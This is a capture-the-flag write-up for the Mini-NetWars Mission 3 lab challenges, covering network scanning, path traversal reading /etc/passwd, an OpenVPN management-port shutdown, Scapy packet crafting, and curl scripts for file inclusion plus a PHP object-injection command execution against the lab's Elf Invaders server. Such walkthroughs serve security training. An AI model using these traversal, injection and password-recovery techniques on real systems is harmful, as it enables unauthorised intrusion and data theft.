Press "Enter" to skip to content

Mini-NetWars – Mission 3 (May 2020)

Snaaake

What two, large words appear first when you exit the game? e.g. Elf Terminal

Quit the game through the UI and then:

______             _____                       _
|  _  \           /  __ \                     | |
| | | |_____   __ | /  \/ ___  _ __  ___  ___ | | ___
| | | / _ \ \ / / | |    / _ \| '_ \/ __|/ _ \| |/ _ \
| |/ /  __/\ V /  | \__/\ (_) | | | \__ \ (_) | |  __/
|___/ \___| \_/    \____/\___/|_| |_|___/\___/|_|\___|

NOTE: Disable in production, port 3000

Tools:

* netcat
* openvpn
* nmap

Your IP is 192.168.64.2

What high-numbered port is open on another host in the same /24 network? e.g. 5000

3000

[email protected]:~$ nmap -p- -sC -sV 192.168.64.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-14 18:44 UTC
Nmap scan report for 192.168.64.1
Host is up (0.00037s latency).

PORT     STATE SERVICE
3000/tcp open  ppp

Nmap scan report for 52aadb50d975 (192.168.64.2)
Host is up (0.00024s latency).

PORT     STATE  SERVICE
3000/tcp closed ppp

Nmap scan report for 960a1eb2-66db-49ea-9940-d1e5ed6dcdec-1.d4fd3562-d3fe-43ac-9d10-a91e46c3d8c2 (192.168.64.3)
Host is up (0.00021s latency).

PORT     STATE SERVICE
3000/tcp open  ppp

Nmap done: 256 IP addresses (3 hosts up) scanned in 2.85 seconds

What flag is shown when you disable something outside the Snaaake game?

NetWars{ShutItDown}

[email protected]:~$ netcat 192.168.64.3 3000
>INFO:OpenVPN Management Interface Version 1 -- type 'help' for more info
help
Management Interface for OpenVPN 2.4.8 x86_64-alpine-linux-musl [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [MH/PKTINFO] [AEAD] built on Feb  7 2020
Commands:
auth-retry t           : Auth failure retry mode (none,interact,nointeract).
bytecount n            : Show bytes in/out, update every n secs (0=off).
echo [on|off] [N|all]  : Like log, but only show messages in echo buffer.
exit|quit              : Close management session.
forget-passwords       : Forget passwords entered so far.
help                   : Print this message.
hold [on|off|release]  : Set/show hold flag to on/off state, or
                         release current hold and start tunnel.
kill cn                : Kill the client instance(s) having common name cn.
kill IP:port           : Kill the client instance connecting from IP:port.
load-stats             : Show global server load stats.
log [on|off] [N|all]   : Turn on/off realtime log display
                         + show last N lines or 'all' for entire history.
mute [n]               : Set log mute level to n, or show level if n is absent.
needok type action     : Enter confirmation for NEED-OK request of 'type',
                         where action = 'ok' or 'cancel'.
needstr type action    : Enter confirmation for NEED-STR request of 'type',
                         where action is reply string.
net                    : (Windows only) Show network info and routing table.
password type p        : Enter password p for a queried OpenVPN password.
remote type [host port] : Override remote directive, type=ACCEPT|MOD|SKIP.
proxy type [host port flags] : Enter dynamic proxy server info.
pid                    : Show process ID of the current OpenVPN process.
client-auth CID KID    : Authenticate client-id/key-id CID/KID (MULTILINE)
client-auth-nt CID KID : Authenticate client-id/key-id CID/KID
client-deny CID KID R [CR] : Deny auth client-id/key-id CID/KID with log reason
                             text R and optional client reason text CR
client-kill CID [M]    : Kill client instance CID with message M (def=RESTART)
env-filter [level]     : Set env-var filter level
client-pf CID          : Define packet filter for client CID (MULTILINE)
rsa-sig                : Enter an RSA signature in response to >RSA_SIGN challenge
                         Enter signature base64 on subsequent lines followed by END
certificate            : Enter a client certificate in response to >NEED-CERT challenge
                         Enter certificate base64 on subsequent lines followed by END
signal s               : Send signal s to daemon,
                         s = SIGHUP|SIGTERM|SIGUSR1|SIGUSR2.
state [on|off] [N|all] : Like log, but show state history.
status [n]             : Show current daemon status info using format #n.
test n                 : Produce n lines of output for testing/debugging.
username type u        : Enter username u for a queried OpenVPN username.
verb [n]               : Set log verbosity level to n, or show if n is absent.
version                : Show current version number.
END
signal SIGTERM
SUCCESS: signal SIGTERM thrown
[email protected]:~$

     __     _   __    __                 ____ _           _    _____ _      ___                  __
  /\ \ \___| |_/ / /\ \ \__ _ _ __ ___  / / _\ |__  _   _| |_  \_   \ |_   /   \_____      ___ __\ \
 /  \/ / _ \ __\ \/  \/ / _` | '__/ __|| |\ \| '_ \| | | | __|  / /\/ __| / /\ / _ \ \ /\ / / '_ \| |
/ /\  /  __/ |_ \  /\  / (_| | |  \__ < < _\ \ | | | |_| | |_/\/ /_ | |_ / /_// (_) \ V  V /| | | |> >
\_\ \/ \___|\__| \/  \/ \__,_|_|  |___/| |\__/_| |_|\__,_|\__\____/  \__/___,' \___/ \_/\_/ |_| |_| |
                                        \_\                                                      /_/

NetWars{ShutItDown}

SAME

If you type in a bad difficulty level, what is the error type that occurs? (e.g. SparkleTooHighError)

FileNotFoundError

What difficulty level would you like? Options: easy, medium, hard -> super hard
Oops, something went wrong reading the configuration file: FileNotFoundError
[Errno 2] No such file or directory: '/home/same/super hard'

Press ctrl-c to exit

If you load an invalid file using a path traversal, what type of file is it expecting? (e.g. YAML)

JSON

╭─[email protected] ~/netwars
╰─$ nc same.elfu.org 8080
What difficulty level would you like? Options: easy, medium, hard -> ../../etc/passwd
Failed to parse JSON configuration file: <class 'json.decoder.JSONDecodeError'>
Expecting value: line 1 column 1 (char 0)

-- START DEBUG INFORMATION --
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
same:x:1000:1000:,,,:/home/same:/bin/bash
Debian-exim:x:101:101::/var/spool/exim4:/usr/sbin/nologin

-- END DEBUG INFORMATION --

Press ctrl-c to exit

Can you find the full path to the Python script? (e.g. /path/to/file.py)

/home/same/same.py

What is the flag at the top of the Python script? (e.g. NetWars{IHeartChristmas} )

NetWars{you_found_me}

╭─[email protected] /proc/self/cwd
╰─$ nc same.elfu.org 8080
What difficulty level would you like? Options: easy, medium, hard -> ../../proc/self/cmdline
Failed to parse JSON configuration file: <class 'json.decoder.JSONDecodeError'>
Expecting value: line 1 column 1 (char 0)

-- START DEBUG INFORMATION --
python3/home/same/same.py
-- END DEBUG INFORMATION --

Press ctrl-c to exit
╭─[email protected] /proc/self/cwd
╰─$ nc same.elfu.org 8080
What difficulty level would you like? Options: easy, medium, hard -> ../../home/same/same.py
Failed to parse JSON configuration file: <class 'json.decoder.JSONDecodeError'>
Expecting value: line 1 column 1 (char 0)

-- START DEBUG INFORMATION --
#!/usr/bin/env python3

# Flag: NetWars{you_found_me}

import json
import random
import os

Snowball Fight

Win a game of Snowball Fight and submit the flag. (e.g. NetWars{BooYa} )

NetWars{YouSankMyBattlefort}

Win a game of Snowball Fight on Impossible and submit the flag.

You can use chrome to override battlefort.js and look at the websocket network history in dev tools. Change the following source code and it should print out the
forts on the board:

ws.onmessage = function (event) {
  // console.log("Incoming ws: " + event.data);
  var messageIn = JSON.parse(event.data);
  messageIn.Verify =
    "gLtBovwCiHRjhMyop4ixz4ZrY7OtPjIcFJH4z5/++jfdgLV3uWHeQrpH6G/6D8vevy7bDFQLrHTCFNEfid6TMaxLLfjubszh4YWz5gErH4UlpVMC5CtMKqocvB33/Ofuy9JW98syEJ8DlHxjWHIfgnFib+tSbB6Mn3lS2aJs3ecS7X9DcdRBIz5PiuVv8XFLsYxYawNN2/IlSpez3TQq9pitBnfK2OftKy9aQvRVaElxYm/rUmwejJ95UtmibN3nzUhgVN+wSzmAGlhhbU1oobGMWGsDTdvyJUqXs900KvatvHia9fQXrL6BZ2J55TShNmf+fu4R02nzzbTKtgFXI0CS8HrrvB6esG/Uvl8IjY7ECriW/24zy4HqV2SZ5VJz7wh8tgE66H1JGiXbhzVDmxfpDBThRiYLTanqPJxw0Rws3nBVCoE40KiHRjiKOOivKmoUgl+BFH114fWj77UeVQXBywXdmWNPGVMJWeL2KqmX/K3sHDWzMkWORecGv5NIdtTot0OsFopJD4u/3YhSVKvAxr7ydRI/+kDPPD8957yiqXhFtZJU1L+TfFZQDyLvzeMV9WpktxeIwpTdgbyaioVxIZ3SlBKPhx4FSXtepu9TS858j2MkGY+2p1FWc6dCtDLvS+20sYhygmIUG/TQN9ynBU/lNdQGkNKxPp5nX5Cx/91Hb3qtWtvuOUqtkb2v24wI31q87S8WKaoWy93l5tBKjkfv6njkUCPpqPWYmpdb0tWU2D7KbirHuU5h8VzvrmIRDvgv8jnf+WbsajMcvdW0z/QVH9UoOxE8TvajTkbjqaJD7AnI8I7x4++jDFtqhQTvi09iGjTvS8JMHSvDAz/pLd1j6VHfaGGpyy5VI6lIhhilpqOKcFQBGNzfIj153A9370YX9rSTrM8UhRVyafrd1WjoSz8hO3P+Nd2uJEzdhps6dVQeA0FkUcNoJphNES0Ztlx7H1m1fkSRlDRR9Z3YmIapTTBo6eNsVCFWPLbfE3VTXArv2lpN7CpY/YMCyYtSZtjcFSz3AFQsMPFHr2Y5JcM3G4Ewfw8MRlzjGNLcD3fvRhf2tJOszxSFFXJp3YC1d7lh3kK6R+hv+g/L3rbTlTGyoCuyVQpaljvMl1okejtWRmico9wuLYDp7UrGhtvhE6sbmaEm4w59ltMnHUjY4tWdmqcMTS6fx5PzOWIlCWbOnd1qVf26HdnHJyADFgg2N7OjlShcv92EEVYdVfc6YZ54r5Lkt51w7nIyQUWWI1FxYy8eXcpEYURvHqIFojRyV9E6IeLn720WCSjcHoanGqGdpHnYWAGDSDs9T/YgLJiUNHMyhGCL9L+ImIiwWvRejDJIRdIwK9h27OHioSsXoGKat2ELWTootQhmUUg=";

  if (messageIn.Type == "SALUTE") {
    document.getElementById("statusVerify").value = messageIn.Verify;
    for (y = 0; y < messageIn.Status["FriendlyLayout"].length; y++) {
      for (x = 0; x < messageIn.Status["FriendlyLayout"][y].length; x++) {
        if (messageIn.Status["FriendlyLayout"][y][x] == 1) {
          document.getElementById("1," + x + "," + y).classList.add("fort");
        }
      }
    }
    document.getElementById("statusVerify").value = messageIn.Verify;
    for (y = 0; y < messageIn.Status["EnemyLayout"].length; y++) {
      for (x = 0; x < messageIn.Status["EnemyLayout"][y].length; x++) {
        if (messageIn.Status["EnemyLayout"][y][x] == 1) {
          document.getElementById("0," + x + "," + y).classList.add("fort");
        }
      }
    }
  }

Click the forts and you end up with a message:

You win!
You won on impossible! NetWars{YouMustBePeeking

Defeat the Enemy with one shot and submit the flag.

Enemy is very literal here and refers to the actual text on the board which is right above 0,0. So lets entire 0, -1 in and we get the following message
in the console:

NetWars{ThatsOneWayToWin}

Play pawng

Complete the Pawng Scapy Trainer. What’s your certificate ID number?

47150284637509565 – Just go through the training to get it. Look at the scapy docs.

Find the (Get Help) Instruction ID from sending a Scapy packet

The packet is described in broken_controller.py, run tail -F /var/log/pawng.log, and use the python to send the packet

2196517487091929

[email protected]:~$ python3
Python 3.6.9 (default, Apr 18 2020, 01:56:04)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from scapy.all import *
>>> sr1(IP(dst="127.0.0.1")/UDP(dport=20,sport=5000))
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
<IP  version=4 ihl=5 tos=0x0 len=1536 id=1 flags= frag=0 ttl=64 proto=udp chksum=0x76ea src=127.0.0.1 dst=127.0.0.1 |<UDP  sport=20 dport=5000 len=1516 chksum=0x5581 |<Raw  load='\xe2\x94\x8d\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x
80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x9
4\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2
\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x91\
n\xe2\x94\x82 ARCADE PAWNG HELP:                                           \xe2\x94\x82\n\xe2\x94\x95\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2
\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\
xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x
80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x99\n1. Get This Help Menu:\n    Send a UDP packet to any 127.0.0.1 w/ a dst UDP port of 20\n
   and src UDP port of 5000.\n2. Move Paddle Up:\n    Send a TCP packet w/ IP dst="127.0.20.180", TCP dport=20, \n    TCP flags="PA", and a TCP raw paylod of load="up".\n3. Move Paddle Down:\n    Send an ICMP echo reply w/ IP dst="127.80
.1.46", and a \n    ICMP raw paylod of load="down".\n4. Change Computer Opponent\'s Difficulty:\n    Send a DNS query response to UDP port 53 with a source \n    port of 6000 to any 127.0.0.1 with a DNS qr=1, DNSQR \n    qname="difficult
y.local", and the DNSRR \n    rrname="difficulty.local" and the DNSRR rdata="100".\nNote: The 100 in rdata="100", specifies difficulty from 0-100.\nNote: Packet protocol details NOT specified above dont matter.\nNote: Results of actions
1-4 are logged to /var/log/pawng.log.\nNote: The first to score 10 points wins. \n\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x8
0\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94
\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\
x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\n' |>>>
>>>
KeyboardInterrupt
>>>
KeyboardInterrupt
>>>
[email protected]:~$ cat /var/log/pawng.log
(Get Help) Instruction ID 2196517487091929 Executed
(Get Help) Instruction ID 2196517487091929 Executed
1. Get This Help Menu:
    Send a UDP packet to any 127.0.0.1 w/ a dst UDP port of 20
   and src UDP port of 5000.
2. Move Paddle Up:
    Send a TCP packet w/ IP dst="127.0.20.180", TCP dport=20,
    TCP flags="PA", and a TCP raw paylod of load="up".
3. Move Paddle Down:
    Send an ICMP echo reply w/ IP dst="127.80.1.46", and a
    ICMP raw paylod of load="down".
4. Change Computer Opponent\'s Difficulty:
    Send a DNS query response to UDP port 53 with a source
    port of 6000 to any 127.0.0.1 with a DNS qr=1, DNSQR
    qname="difficulty.local", and the DNSRR
    rrname="difficulty.local" and the DNSRR rdata="100".
Note: The 100 in rdata="100", specifies difficulty from 0-100.
Note: Packet protocol details NOT specified above dont matter.
Note: Results of actions 1-4 are logged to /var/log/pawng.log.
Note: The first to score 10 points wins.

Find the (Move Up) Paddle Instruction ID

9802227387255195

[email protected]:~\$ python3
Python 3.6.9 (default, Apr 18 2020, 01:56:04)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.

> > > from scapy.all import\*
> > > sr1(IP(dst="127.0.20.180")/TCP(dport=20,flags="PA")/Raw(load="up"))
> > > Begin emission:
> > > Finished sending 1 packets.
> > > .^C
> > > Received 1 packets, got 0 answers, remaining 1 packets
> > >
> > > [email protected]:~\$ cat /var/log/pawng.log
> > > (Get Help) Instruction ID 2196517487091929 Executed
> > > (Get Help) Instruction ID 2196517487091929 Executed
> > > (Move Up) Paddle Instruction ID 9802227387255195 Executed
> > > (Move Up) Paddle Instruction ID 9802227387255195 Executed

Find the Move Down Instruction

2116779544198846

[email protected]:~$ tail -F /var/log/pawng.log &
[1] 206
[email protected]:~$ (Get Help) Instruction ID 2196517487091929 Executed
(Get Help) Instruction ID 2196517487091929 Executed
(Move Up) Paddle Instruction ID 9802227387255195 Executed
(Move Up) Paddle Instruction ID 9802227387255195 Executed
[email protected]:~\$ python3
Python 3.6.9 (default, Apr 18 2020, 01:56:04)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.

> > > from scapy.all import \*
> > > send(IP(dst="127.80.1.46")/ICMP(type="echo-reply")/Raw(load="down"))
> > > .
> > > Sent 1 packets.
> > > (Move Down) Paddle Instruction ID 2116779544198846 Executed

Find the CHange Difficult Instruction ID

8892931792975189

[email protected]:~\$ ./scapy
> > > sr1(IP(dst="127.0.0.1")/UDP(sport=6000, dport=53)/DNS(qr=1,qd=DNSQR(qname="difficulty.local"), an=DNSRR(rrname="difficulty.local", rdata="0")))
> > > Begin emission:
> > > Finished sending 1 packets.
> > > .(Change Difficulty) Instruction ID 8892931792975189 Executed

Win Pawng!

Use the packets above in the source code after copying it into a new file. If you set the difficulty to 0 you’ll just win really quick. The win screen says

Prolific Ping Pawng Pwner

def set_difficulty(GAME_DIFFICULTY="100"):
    send(IP(dst="127.0.0.1")/UDP(sport=6000, dport=53)/DNS(qr=1,qd=DNSQR(qname="difficulty.local"), an=DNSRR(rrname="difficulty.local", rdata="0")), iface="lo", verbose=False)

def paddle_up():
    send(IP(dst="127.0.20.180")/TCP(dport=20,flags="PA")/Raw(load="up"), iface="lo", verbose=False)

def paddle_down():
    send(IP(dst="127.80.1.46")/ICMP(type="echo-reply")/Raw(load="down"), iface="lo", verbose=False)

Elf Invaders

https://www.bram.us/2020/04/08/how-to-enable-http3-in-chrome-firefox-safari/ Enable HTTP3 in firefox

Find the version number of the Cabinet once you see the game. (e.g. 8.675309)

In the source of the main HTML file is

<meta name="description" content="Elf Invaders Version 1.61434327095534551" />

What is the message when you score over 9500? (e.g. That’s over 9500!)

In the hitbox detection function, set player.score = 10000 and then let it resume execution. You eventually make a request to the API that results in a response
with Score Level Over 9000!


Disclosure: I did not complete the challenges below. The following notes are from another player that shared the notes with me.

What’s the date in api.php?

5/1/2019

It looks like there’s an api request with a file. Use the curl version on the elf debug terminal since it has http3 support. Create a script, lfi.sh.

#!/bin/sh
curl --silent --http3 'https://elf-invaders.elfu.org/api.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: https://elf-invaders.elfu.org' -H 'Alt-Used: elf-invaders.elfu.org' -H 'Connection: keep-alive' -H 'Referer: https://elf-invaders.elfu.org/leaderboard.php' -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' -H 'TE: Trailers' --data-raw "conf=${1}" | sed -n 's/.*"data":"//p' | sed -n 's/"}//p'
echo ''

We can then use the script to grab stuff

../config/config.json returns a file
../../www/config/config.json
./lfi.sh "../../../var/www/config/config.json" works but /var/www/config/config.json doesn't work
../lfi.sh ../html/api.php

in api.php

<?php
  // Made By Alabaster Snowball on 5/1/2019
  function get_db() {
    $dbname = '/var/www/db/elfinvaders.sqlite';
    if (file_exists($dbname) && filesize($dbname) > 500000) {
      unlink($dbname);
    }

Find the name of the debug PCAP on the web server.

Looking in api.php, we can do directory listings too with list= as the payload. Create dir.sh:

#!/bin/sh
curl --silent --http3 'https://elf-invaders.elfu.org/api.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: https://elf-invaders.elfu.org' -H 'Alt-Used: elf-invaders.elfu.org' -H 'Connection: keep-alive' -H 'Referer: https://elf-invaders.elfu.org/leaderboard.php' -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' -H 'TE: Trailers' --data-raw "list=${1}"
echo ''

We can use this to list files and find there’s a file adminlogin_debug.pcap.

Find Alabaster’s password. (e.g. DirectReindeerFlatteryStable)

Grabbing the adminlogin_debug.client_random and using it in wireshark to decrypt the QUIC in the pcap we find some payloads:

@Ç(ÍðôÒ¹~îåÚ6¡GREASE is the word,ÔQ`rRj®zÿ×P¢\.®Ã_P%¶Pë¸úàZþ?ÝTqÿï@Eusername=alabaster_snowball&password=4084072e86e12aabef9ace3e39145ba3

Entering 4084072e86e12aabef9ace3e39145ba3 as the flag works.

Update the cabinet’s firmware and retrieve the new version number.

People left files sitting around so I found this without doing what’s intended, just the LFI and directory listing, but I did most of the object injection anyways.

2.11516925085506347

get_auth_cookie.sh

#!/bin/sh
curl -v --http3 'https://elf-invaders.elfu.org/admin.php' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: https://elf-invaders.elfu.org' -H 'Alt-Used: elf-invaders.elfu.org' -H 'Connection: keep-alive' -H 'Referer: https://elf-invaders.elfu.org/leaderboard.php' -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' -H 'TE: Trailers' --data-raw "username=alabaster_snowball&password=4084072e86e12aabef9ace3e39145ba3" 2>&1 | grep "set-cookie" | sed -E "s/.*elfinv=([a-zA-Z0-9._-]+);.*/\1/"

php for generating the object injection

<?php
  class OldAdminMethod
  {
    // Will remove this later after testing more secure new admin class
    public $command;
    public $logname;

    function __construct($cmd="", $log='/var/www/db/cmdhist.log')
    {
      $this->command = $cmd;
      $this->logname = $log;
    }

    public function readlog() {
      if (file_exists($this->logname) && is_readable($this->logname)) {
        return preg_replace( '/[^[:print:]\r\n\t]/', '', file_get_contents($this->logname));
      }
    }

    function __destruct()
    {
      $stdout = shell_exec($this->command);
      if (strlen($stdout)) {
        if (is_writable(dirname($this->logname))) {
          file_put_contents($this->logname, "{$this->command}\n$stdout");
        }
      }
    }
  }

$file = '/var/www/db/cmdhist.log';
$oldAdminMethod = new OldAdminMethod('/usr/bin/firmwareupdate', $file);
echo "'" . serialize($oldAdminMethod) . "'";
echo "\n";

generates

'O:14:"OldAdminMethod":2:{s:7:"command";s:2:"ls";s:7:"logname";s:23:"/var/www/db/cmdhist.log";}'

Then we can use the cookie and the above to generate a request to admin.php to do command injection via the object injection. When instantiating the class
the constructor and then the destructor will be called.

curl -v --http3 'https://elf-invaders.elfu.org/admin.php' -H "Cookie:
elfinv=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWxhYmFzdGVyX3Nub3diYWxsIiwiZXhwaXJlcyI6MTU4OTY3Mjc3NiwiZXhwIjozMTc5MjU5MTUyfQ.fwQJ4c-jpMHxG7_H_4uT82368Xb9DnE1LhhE0HcX03k" -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: https://elf-invaders.elfu.org' -H 'Alt-Used: elf-invaders.elfu.org' -H 'Connection: keep-alive' -H 'Referer: https://elf-invaders.elfu.org/leaderboard.php' -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' -H 'TE: Trailers' --data-raw 'method=read_file&arguments=O:14:"OldAdminMethod":2:{s:7:"command";s:23:"/usr/bin/firmwareupdate";s:7:"logname";s:23:"/var/www/db/cmdhist.log";}'

Then we should be able to use LFI to get the log.

[email protected]:~\$ ./lfi.sh ../db/cmdhist.log | xxd -r -p
/usr/bin/firmwareupdate
Firmware Updated - Elf Invader Version 2.11516925085506347

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *